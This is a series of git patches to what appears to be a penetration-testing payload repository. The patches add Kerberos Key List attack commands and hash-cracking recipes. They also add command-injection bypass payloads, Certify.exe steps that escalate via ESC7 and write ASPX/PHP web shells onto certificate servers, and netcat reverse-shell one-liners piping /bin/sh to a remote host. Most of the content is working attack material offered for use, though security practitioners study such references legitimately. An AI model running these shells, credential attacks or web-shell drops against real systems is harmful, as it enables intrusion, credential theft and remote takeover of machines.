**Allowed RODC Password Replication**, their credentials are stored in the server, and the **msDS-RevealedList** attribute of the RODC is populated with the username. + +**Requirements**: +* [Impacket PR #1210 - The Kerberos Key List Attack](https://github.com/SecureAuthCorp/impacket/pull/1210) +* **krbtgt** credentials of the RODC (-rodcKey) +* **ID of the krbtgt** account of the RODC (-rodcNo) + +**Exploitation**: +```ps1 +# keylistattack.py using SAMR user enumeration without filtering (-full flag) +keylistattack.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -full + +# keylistattack.py defining a target username (-t flag) +keylistattack.py -kdc sever.domain.local -t user -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX LIST + +# secretsdump.py using the Kerberos Key List Attack option (-use-keylist) +secretsdump.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -use-keylist +``` + ### PXE Boot image attack PXE allows a workstation to boot from the network by retrieving an operating system image from a server using TFTP (Trivial FTP) protocol. This boot over the network allows an attacker to fetch the image and interact with it. @@ -3442,3 +3464,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [sAMAccountName spoofing - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing) * [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html) * [ADCS: Playing with ESC4 - Matthew Creel](https://www.fortalicesolutions.com/posts/adcs-playing-with-esc4) +* [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/) \ No newline at end of file From 4642dd44fcfef8f99849a34a2a3bd1783e545d45 Mon Sep 17 00:00:00 2001 From: clem9669 <18504086+clem9669@users.noreply.github.com> Date: Wed, 5 Jan 2022 18:25:31 +0000 Subject: [PATCH 19/50] Update Hash Cracking.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Hey 👋 Updating content with more information and more accurate resources. --- Methodology and Resources/Hash Cracking.md | 64 +++++++++++++++------- 1 file changed, 43 insertions(+), 21 deletions(-) diff --git a/Methodology and Resources/Hash Cracking.md b/Methodology and Resources/Hash Cracking.md index c720725..c598774 100644 --- a/Methodology and Resources/Hash Cracking.md +++ b/Methodology and Resources/Hash Cracking.md @@ -5,7 +5,7 @@ * [Hashcat](https://hashcat.net/hashcat/) * [Hashcat Example Hashes](https://hashcat.net/wiki/doku.php?id=example_hashes) * [Hashcat Install](#hashcat-install) - * [Brute-Force](#brute-force) + * [Mask attack](#mask-attack) * [Dictionary](#dictionary) * [John](https://github.com/openwall/john) * [Usage](#john-usage) @@ -25,8 +25,40 @@ apt install checkinstall git -y git clone https://github.com/hashcat/hashcat.git && cd hashcat && make -j 8 && make install ``` +1. Extract the hash +2. Get the hash format: https://hashcat.net/wiki/doku.php?id=example_hashes +3. Establish a cracking stratgy based on hash format (ex: wordlist -> wordlist + rules -> mask -> combinator mode -> prince attack -> ...) +4. Enjoy plains +5. Review strategy +6. Start over -### Brute-Force +### Dictionary + +> Every word of a given list (a.k.a. dictionary) is hashed and compared against the target hash. + +```powershell +hashcat --attack-mode 0 --hash-type $number $hashes_file $wordlist_file -r $my_rules +``` + +* Wordlists + * [packetstorm](https://packetstormsecurity.com/Crackers/wordlists/) + * [weakpass_3a](https://download.weakpass.com/wordlists/1948/weakpass_3a.7z) + * [weakpass_3](https://download.weakpass.com/wordlists/1947/weakpass_3.7z) + * [Hashes.org](https://download.weakpass.com/wordlists/1931/Hashes.org.7z) + * [kerberoast_pws](https://gist.github.com/edermi/f8b143b11dc020b854178d3809cf91b5/raw/b7d83af6a8bbb43013e04f78328687d19d0cf9a7/kerberoast_pws.xz) + * [hashmob.net](https://hashmob.net/research/wordlists) + * [clem9669/wordlists](https://github.com/clem9669/wordlists) + +* Rules + * [One Rule to Rule Them All](https://notsosecure.com/one-rule-to-rule-them-all/) + * [nsa-rules](https://github.com/NSAKEY/nsa-rules) + * [hob064](https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/hob064.rule) + * [d3adhob0](https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/d3adhob0.rule) + * [clem9669/hashcat-rule](https://github.com/clem9669/hashcat-rule) + +### Mask attack + +Mask attack is an attack mode which optimize brute-force. > Every possibility for a given character set and a given length (i.e. aaa, aab, aac, ...) is hashed and compared against the target hash. @@ -71,25 +103,7 @@ hashcat --attack-mode 3 --custom-charset1 "?u" --custom-charset2 "?l?u?d" --cust | ?a | ?l?u?d?s | | ?b | 0x00 - 0xff | -### Dictionary -> Every word of a given list (a.k.a. dictionary) is hashed and compared against the target hash. - -```powershell -hashcat --attack-mode 0 --hash-type $number $hashes_file $wordlist_file -``` - -* Wordlists - * [packetstorm](https://packetstormsecurity.com/Crackers/wordlists/) - * [weakpass_3a](https://download.weakpass.com/wordlists/1948/weakpass_3a.7z) - * [weakpass_3](https://download.weakpass.com/wordlists/1947/weakpass_3.7z) - * [Hashes.org](https://download.weakpass.com/wordlists/1931/Hashes.org.7z) - * [kerberoast_pws](https://gist.github.com/edermi/f8b143b11dc020b854178d3809cf91b5/raw/b7d83af6a8bbb43013e04f78328687d19d0cf9a7/kerberoast_pws.xz) -* Rules - * [One Rule to Rule Them All](https://notsosecure.com/one-rule-to-rule-them-all/) - * [nsa-rules](https://github.com/NSAKEY/nsa-rules) - * [hob064](https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/hob064.rule) - * [d3adhob0](https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/d3adhob0.rule) ## John @@ -103,6 +117,9 @@ john passwd # Use a specific wordlist john --wordlist= passwd +# Use a specific wordlist with rules +john --wordlist= passwd --rules=Jumbo + # Show cracked passwords john --show passwd @@ -127,16 +144,21 @@ john --restore * [How To Build A Password Cracking Rig - 5000$](https://www.netmux.com/blog/how-to-build-a-password-cracking-rig) * Online cracking * [Hashes.com](https://hashes.com/en/decrypt/hash) + * [hashmob.net](https://hashmob.net/): great community with Discord * Use the `loopback` in combination with rules and dictionary to keep cracking until you don't find new passsword: `hashcat --loopback --attack-mode 0 --rules-file $rules_file --hash-type $number $hashes_file $wordlist_file` ## Online Cracking Resources -* [hashes.com](https://hashes.com) +* ~~[hashes.com](https://hashes.com)~~ * [crackstation](https://crackstation.net) +* [Hashmob](https://hashmob.net/) ## References * [Cracking - The Hacker Recipes](https://www.thehacker.recipes/ad-ds/movement/credentials/cracking) * [Using Hashcat to Crack Hashes on Azure](https://durdle.com/2017/04/23/using-hashcat-to-crack-hashes-on-azure/) +* [miloserdov.org hashcat](https://miloserdov.org/?p=5426&PageSpeed=noscript) +* [digtvbg.com](https://digtvbg.com/files/books-for-hacking/Hash%20Crack%20-%20Password%20Cracking%20Manual%20%28v2.0%29%20by%20Joshua%20Picolet.pdf) +* [miloserdov.org john](https://miloserdov.org/?p=4961&PageSpeed=noscript) From f0085e158b16752c5dc350b7756bc5d9a2606570 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Wed, 5 Jan 2022 22:22:08 +0100 Subject: [PATCH 20/50] Removing potential DMCA material --- Methodology and Resources/Hash Cracking.md | 1 - 1 file changed, 1 deletion(-) diff --git a/Methodology and Resources/Hash Cracking.md b/Methodology and Resources/Hash Cracking.md index c598774..619921f 100644 --- a/Methodology and Resources/Hash Cracking.md +++ b/Methodology and Resources/Hash Cracking.md @@ -160,5 +160,4 @@ john --restore * [Cracking - The Hacker Recipes](https://www.thehacker.recipes/ad-ds/movement/credentials/cracking) * [Using Hashcat to Crack Hashes on Azure](https://durdle.com/2017/04/23/using-hashcat-to-crack-hashes-on-azure/) * [miloserdov.org hashcat](https://miloserdov.org/?p=5426&PageSpeed=noscript) -* [digtvbg.com](https://digtvbg.com/files/books-for-hacking/Hash%20Crack%20-%20Password%20Cracking%20Manual%20%28v2.0%29%20by%20Joshua%20Picolet.pdf) * [miloserdov.org john](https://miloserdov.org/?p=4961&PageSpeed=noscript) From 2f551d6bb5d98023185705441dda970280392968 Mon Sep 17 00:00:00 2001 From: Flower Dev <67862441+Flower-dev@users.noreply.github.com> Date: Thu, 13 Jan 2022 21:18:12 +0100 Subject: [PATCH 21/50] BOOKS.md : new books --- BOOKS.md | 1 + 1 file changed, 1 insertion(+) diff --git a/BOOKS.md b/BOOKS.md index 9267f52..ddd5422 100644 --- a/BOOKS.md +++ b/BOOKS.md @@ -32,6 +32,7 @@ - [The Hacker Playbook 2: Practical Guide to Penetration Testing by Peter Kim (2015)](https://www.goodreads.com/book/show/25791488-the-hacker-playbook-2) - [The Hacker Playbook 3: Practical Guide to Penetration Testing (Red Team Edition) by Peter Kim (2018)](https://www.goodreads.com/book/show/40028366-the-hacker-playbook-3) - [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi (2009)](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html) +- [The Hardware Hacking Handbook by Jasper van Woudenberg & Colin O'Flynn (2022)](https://nostarch.com/hardwarehacking) - [The Mobile Application Hacker's Handbook by Dominic Chell et al. (2015)](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html) - [The Shellcoders Handbook by Chris Anley et al. (2007)](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html) - [The Web Application Hackers Handbook by D. Stuttard, M. Pinto (2011)](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html) From 7775ce25845ae3e789d5275a169c6aa8baad3488 Mon Sep 17 00:00:00 2001 From: Flower Dev <67862441+Flower-dev@users.noreply.github.com> Date: Thu, 13 Jan 2022 21:23:47 +0100 Subject: [PATCH 22/50] BOOKS.md: add books --- BOOKS.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/BOOKS.md b/BOOKS.md index ddd5422..d6b092f 100644 --- a/BOOKS.md +++ b/BOOKS.md @@ -23,8 +23,11 @@ - [Pratical Binary Analysis: Build Your Own Linux Tools for Binary instrumentation, Analysis, and Disassembly by Dennis Andriesse (2019)](https://nostarch.com/binaryanalysis) - [Pratical Forensic Imaging: Securing Digital Evidence with Linux Tools by Bruce Nikkel (2016)](https://nostarch.com/forensicimaging) - [Pratical IoT Hacking: The Definitive Guide to Attacking the Internet of Things by Fotios Chantzis, Ioannis Stais, Paulino Calderon, Evangelos Deirmentzoglou and Beau Woods (2021)](https://nostarch.com/practical-iot-hacking) +-[Practical Doomsday: A User's Guide to the End of the World by Michal Zalewski (2022)](https://nostarch.com/practical-doomsday) +- [Practical Social Engineering: A Primer for the Ethical Hacker by Joe Gray (2022)](https://nostarch.com/practical-social-engineering) - [Real-World Bug Hunting: A Field Guide to Web Hacking by Peter Yaworski (2019)](https://nostarch.com/bughunting) - [Rootkits and Bootkits: Reversing Modern Malware and Next Generation Threats by Alex Matrosov, Eugene Rodionov, and Sergey Bratus (2019)](https://nostarch.com/rootkits) +- [The Art of Cyberwarfare: An Investigator's Guide to Espionage, Ransomware, and Organized Cybercrime by Jon DiMaggio (2022)](https://nostarch.com/art-cyberwarfare) - [The Car Hacker's Handbook: A Guide for the Penetration Tester by Craig Smith (2016)](https://nostarch.com/carhacking) - [The Browser Hacker's Handbook by Wade Alcorn et al. (2014)](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html) - [The Database Hacker's Handbook, David Litchfield et al. (2005)](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html) From c90cb69def5e9dfb1e6ff1ea6c79f8a302f3a1f5 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 13 Jan 2022 21:48:21 +0100 Subject: [PATCH 23/50] Update BOOKS.md --- BOOKS.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/BOOKS.md b/BOOKS.md index d6b092f..1ef26c3 100644 --- a/BOOKS.md +++ b/BOOKS.md @@ -23,7 +23,7 @@ - [Pratical Binary Analysis: Build Your Own Linux Tools for Binary instrumentation, Analysis, and Disassembly by Dennis Andriesse (2019)](https://nostarch.com/binaryanalysis) - [Pratical Forensic Imaging: Securing Digital Evidence with Linux Tools by Bruce Nikkel (2016)](https://nostarch.com/forensicimaging) - [Pratical IoT Hacking: The Definitive Guide to Attacking the Internet of Things by Fotios Chantzis, Ioannis Stais, Paulino Calderon, Evangelos Deirmentzoglou and Beau Woods (2021)](https://nostarch.com/practical-iot-hacking) --[Practical Doomsday: A User's Guide to the End of the World by Michal Zalewski (2022)](https://nostarch.com/practical-doomsday) +- [Practical Doomsday: A User's Guide to the End of the World by Michal Zalewski (2022)](https://nostarch.com/practical-doomsday) - [Practical Social Engineering: A Primer for the Ethical Hacker by Joe Gray (2022)](https://nostarch.com/practical-social-engineering) - [Real-World Bug Hunting: A Field Guide to Web Hacking by Peter Yaworski (2019)](https://nostarch.com/bughunting) - [Rootkits and Bootkits: Reversing Modern Malware and Next Generation Threats by Alex Matrosov, Eugene Rodionov, and Sergey Bratus (2019)](https://nostarch.com/rootkits) From 171a6f2b21287317f96a3a71f80315da7b10d89e Mon Sep 17 00:00:00 2001 From: int0x80 Date: Fri, 14 Jan 2022 18:39:52 -0600 Subject: [PATCH 24/50] Command Injection space alternatives --- Command Injection/README.md | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) diff --git a/Command Injection/README.md b/Command Injection/README.md index a4e0d0b..9df048a 100644 --- a/Command Injection/README.md +++ b/Command Injection/README.md @@ -96,6 +96,16 @@ Commands execution without spaces, $ or { } - Linux (Bash only) IFS=,;`cat<</tmp/hi< Date: Tue, 18 Jan 2022 22:52:58 +0100 Subject: [PATCH 25/50] Update Active Directory Attack.md Correcting typo Removing dead website Adjusting techniques --- .../Active Directory Attack.md | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index e5dee5b..04f6c0a 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -1254,14 +1254,15 @@ Useful when you want to have the clear text password or when you need to make st Recommended wordlists: - rockyou (available in Kali Linux) -- Have I Been Powned (https://hashes.org/download.php?hashlistId=7290&type=hfound) -- Collection #1 (passwords from Data Breaches, might be illegal to possess) +- Have I Been Pwned founds (https://hashmob.net/hashlists/info/4169-Have%20I%20been%20Pwned%20V8%20(NTLM)) +- Weakpass.com +- Read More at [Methodology and Resources/Hash Cracking.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md) ```powershell # Basic wordlist # (-O) will Optimize for 32 characters or less passwords # (-w 4) will set the workload to "Insane" -$ hashcat64.exe -m 1000 -w 4 -O -a 0 -o pathtopotfile pathtohashes pathtodico -r ./rules/best64.rule --opencl-device-types 1,2 +$ hashcat64.exe -m 1000 -w 4 -O -a 0 -o pathtopotfile pathtohashes pathtodico -r myrules.rule --opencl-device-types 1,2 # Generate a custom mask based on a wordlist $ git clone https://github.com/iphelix/pack/blob/master/README @@ -1270,7 +1271,9 @@ $ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H. ``` :warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like : -- [hashes.org](https://hashes.org/check.php) +- ~~[hashes.org](https://hashes.org/check.php)~~ +- [hashmob.net](https://hashmob.net) +- [crackstation.net](https://crackstation.net) - [hashes.com](https://hashes.com/en/decrypt/hash) ### Password spraying @@ -3464,4 +3467,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [sAMAccountName spoofing - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing) * [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html) * [ADCS: Playing with ESC4 - Matthew Creel](https://www.fortalicesolutions.com/posts/adcs-playing-with-esc4) -* [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/) \ No newline at end of file +* [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/) From a077ceab7c8a527a9948d013bb3d2f952571afc8 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Sat, 22 Jan 2022 22:57:37 +0100 Subject: [PATCH 26/50] add tools section --- Methodology and Resources/Reverse Shell Cheatsheet.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 4bd3902..f276ddf 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -2,6 +2,7 @@ ## Summary +* [Tools](#tools) * [Reverse Shell](#reverse-shell) * [Awk](#awk) * [Automatic Reverse Shell Generator](#revshells) @@ -39,6 +40,10 @@ * [Spawn TTY Shell](#spawn-tty-shell) * [References](#references) +## Tools + +- [reverse-shell-generator](https://www.revshells.com/) - Hosted Reverse Shell generator ([source](https://github.com/0dayCTF/reverse-shell-generator)) + ## Reverse Shell ### Bash TCP From a397a3d64300ac0cec27efc02e755d2116a36444 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Sat, 22 Jan 2022 23:08:25 +0100 Subject: [PATCH 27/50] add revshellgen and merge to tools section --- Methodology and Resources/Reverse Shell Cheatsheet.md | 9 ++------- 1 file changed, 2 insertions(+), 7 deletions(-) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index f276ddf..b1d5bae 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -42,7 +42,8 @@ ## Tools -- [reverse-shell-generator](https://www.revshells.com/) - Hosted Reverse Shell generator ([source](https://github.com/0dayCTF/reverse-shell-generator)) +- [reverse-shell-generator](https://www.revshells.com/) - Hosted Reverse Shell generator ([source](https://github.com/0dayCTF/reverse-shell-generator)) ![image](https://user-images.githubusercontent.com/44453666/115149832-d6a75980-a033-11eb-9c50-56d4ea8ca57c.png) +- [revshellgen](https://github.com/t0thkr1s/revshellgen) - CLI Reverse Shell generator ## Reverse Shell @@ -439,12 +440,6 @@ main() { } ``` -## RevShells - -https://www.revshells.com/ -![image](https://user-images.githubusercontent.com/44453666/115149832-d6a75980-a033-11eb-9c50-56d4ea8ca57c.png) - - ## Meterpreter Shell ### Windows Staged reverse TCP From 05a77e06fc74cc3c7cd3ab8fe3473bac29b43b0b Mon Sep 17 00:00:00 2001 From: clem9669 <18504086+clem9669@users.noreply.github.com> Date: Wed, 26 Jan 2022 13:13:11 +0000 Subject: [PATCH 28/50] Update Active Directory Attack.md Updating the scanner modules for PingCastle.exe --- Methodology and Resources/Active Directory Attack.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 04f6c0a..6110263 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -175,7 +175,7 @@ pingcastle.exe --healthcheck --server domain.local pingcastle.exe --graph --server domain.local pingcastle.exe --scanner scanner_name --server domain.local - available scanners are:aclcheck,antivirus,corruptADDatabase,foreignusers,laps_bitlocker,localadmin,ullsession,nullsession-trust,share,smb,spooler,startup + available scanners are:aclcheck,antivirus,computerversion,foreignusers,laps_bitlocker,localadmin,nullsession,nullsession-trust,oxidbindings,remote,share,smb,smb3querynetwork,spooler,startup,zerologon,computers,users ``` * [Kerbrute](https://github.com/ropnop/kerbrute) From d7e357f53a30bbd7b4e4b89012f357bd787cfced Mon Sep 17 00:00:00 2001 From: Eslam Salem Date: Sat, 29 Jan 2022 17:19:30 +0200 Subject: [PATCH 29/50] fix rm bug in netcat reverseshell on OpenBSD & BusyBox --- Methodology and Resources/Reverse Shell Cheatsheet.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index b1d5bae..e1da152 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -208,13 +208,13 @@ nc -c bash 10.0.0.1 4242 ### Netcat OpenBsd ```bash -rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f +rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f ``` ### Netcat BusyBox ```bash -rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f +rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f ``` ### Ncat From 0b5c5acb8703c0cdfba2a698b65ef64144923777 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 30 Jan 2022 23:41:31 +0100 Subject: [PATCH 30/50] ESC7 - Vulnerable Certificate Authority Access Control --- .../Active Directory Attack.md | 26 +++++++++++++++++++ SQL Injection/OracleSQL Injection.md | 2 ++ 2 files changed, 28 insertions(+) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 6110263..c0c16fe 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -77,6 +77,7 @@ - [ESC2 - Misconfigured Certificate Templates](#esc2---misconfigured-certificate-templates) - [ESC4 - Access Control Vulnerabilities](#esc4---access-control-vulnerabilities) * [ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 ](#esc6---editf_attributesubjectaltname2) + * [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control) - [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack) - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces) @@ -2278,6 +2279,30 @@ Mitigation: * Remove the flag : `certutil.exe -config "CA01.domain.local\CA01" -setreg "policy\EditFlags" -EDITF_ATTRIBUTESUBJECTALTNAME2` +#### ESC7 - Vulnerable Certificate Authority Access Control + +Exploitation: +* Detect CAs that allow low privileged users the ManageCA permission + ```ps1 + Certify.exe find /vulnerable + ``` +* Change the CA settings to enable the SAN extension for all the templates under the vulnerable CA (ESC6) + ```ps1 + Certify.exe setconfig /enablesan /restart + ``` +* Request the certificate with the desired SAN. + ```ps1 + Certify.exe request /template:User /altname:super.adm + ``` +* Grant approval if required or disable the approval requirement + ```ps1 + # Grant + Certify.exe issue /id:[REQUEST ID] + # Disable + Certify.exe setconfig /removeapproval /restart + ``` + + #### ESC8 - AD CS Relay Attack > An attacker can trigger a Domain Controller using PetitPotam to NTLM relay credentials to a host of choice. The Domain Controller’s NTLM Credentials can then be relayed to the Active Directory Certificate Services (AD CS) Web Enrollment pages, and a DC certificate can be enrolled. This certificate can then be used to request a TGT (Ticket Granting Ticket) and compromise the entire domain through Pass-The-Ticket. @@ -3468,3 +3493,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html) * [ADCS: Playing with ESC4 - Matthew Creel](https://www.fortalicesolutions.com/posts/adcs-playing-with-esc4) * [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/) +* [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/) \ No newline at end of file diff --git a/SQL Injection/OracleSQL Injection.md b/SQL Injection/OracleSQL Injection.md index 45c0d66..39535ed 100644 --- a/SQL Injection/OracleSQL Injection.md +++ b/SQL Injection/OracleSQL Injection.md @@ -79,6 +79,8 @@ AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ## Oracle SQL Command execution +* [ODAT (Oracle Database Attacking Tool)](https://github.com/quentinhardy/odat) + ```sql /* create Java class */ BEGIN From d36f98b4ca560c7dcb9b63161af8ebd3fd78e227 Mon Sep 17 00:00:00 2001 From: brightio Date: Mon, 31 Jan 2022 12:16:29 +0100 Subject: [PATCH 31/50] Update LinPEAS links --- Methodology and Resources/Linux - Privilege Escalation.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index c0a39c0..2021fea 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -54,11 +54,11 @@ There are many scripts that you can execute on a linux machine which automatically enumerate sytem information, processes, and files to locate privilege escelation vectors. Here are a few: -- [LinPEAS - Linux Privilege Escalation Awesome Script](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) +- [LinPEAS - Linux Privilege Escalation Awesome Script](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) ```powershell - wget "https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh" -O linpeas.sh - curl "https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh" -o linpeas.sh + wget "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" -O linpeas.sh + curl "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" -o linpeas.sh ./linpeas.sh -a #all checks - deeper system enumeration, but it takes longer to complete. ./linpeas.sh -s #superfast & stealth - This will bypass some time consuming checks. In stealth mode Nothing will be written to the disk. ./linpeas.sh -P #Password - Pass a password that will be used with sudo -l and bruteforcing other users From 71dcfd5ca765fe7d1397c62a733066c63bceed19 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 18 Feb 2022 14:50:38 +0100 Subject: [PATCH 32/50] ADCS ESC7 Shell + Big Query SQL --- .../Active Directory Attack.md | 32 ++++++++- .../Miscellaneous - Tricks.md | 10 +++ .../Network Pivoting Techniques.md | 7 +- SQL Injection/BigQuery Injection.md | 70 +++++++++++++++++++ 4 files changed, 114 insertions(+), 5 deletions(-) create mode 100644 SQL Injection/BigQuery Injection.md diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index c0c16fe..60637d8 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -260,7 +260,12 @@ root@payload$ ./bloodhound --no-sandbox Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j ``` -You can add some custom queries like [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json) and [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json). Replace the customqueries.json file located at `/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json`. +You can add some custom queries like : +* [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json) +* [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json) +* [BloodHound Custom Queries from Exegol - @ShutdownRepo](https://raw.githubusercontent.com/ShutdownRepo/Exegol/master/sources/bloodhound/customqueries.json) + +Replace the customqueries.json file located at `/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json`. ### Using PowerView @@ -2302,6 +2307,22 @@ Exploitation: Certify.exe setconfig /removeapproval /restart ``` +Alternative exploitation from **ManageCA** to **RCE** on ADCS server: + +```ps1 +# Get the current CDP list. Useful to find remote writable shares: +Certify.exe writefile /ca:SERVER\ca-name /readonly + +# Write an aspx shell to a local web directory: +Certify.exe writefile /ca:SERVER\ca-name /path:C:\Windows\SystemData\CES\CA-Name\shell.aspx /input:C:\Local\Path\shell.aspx + +# Write the default asp shell to a local web directory: +Certify.exe writefile /ca:SERVER\ca-name /path:c:\inetpub\wwwroot\shell.asp + +# Write a php shell to a remote web directory: +Certify.exe writefile /ca:SERVER\ca-name /path:\\remote.server\share\shell.php /input:C:\Local\path\shell.php +``` + #### ESC8 - AD CS Relay Attack @@ -2599,11 +2620,15 @@ bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F38 > DCOM is an extension of COM (Component Object Model), which allows applications to instantiate and access the properties and methods of COM objects on a remote computer. -* Impacket DcomExec.py +* Impacket DCOMExec.py ```ps1 dcomexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-debug] 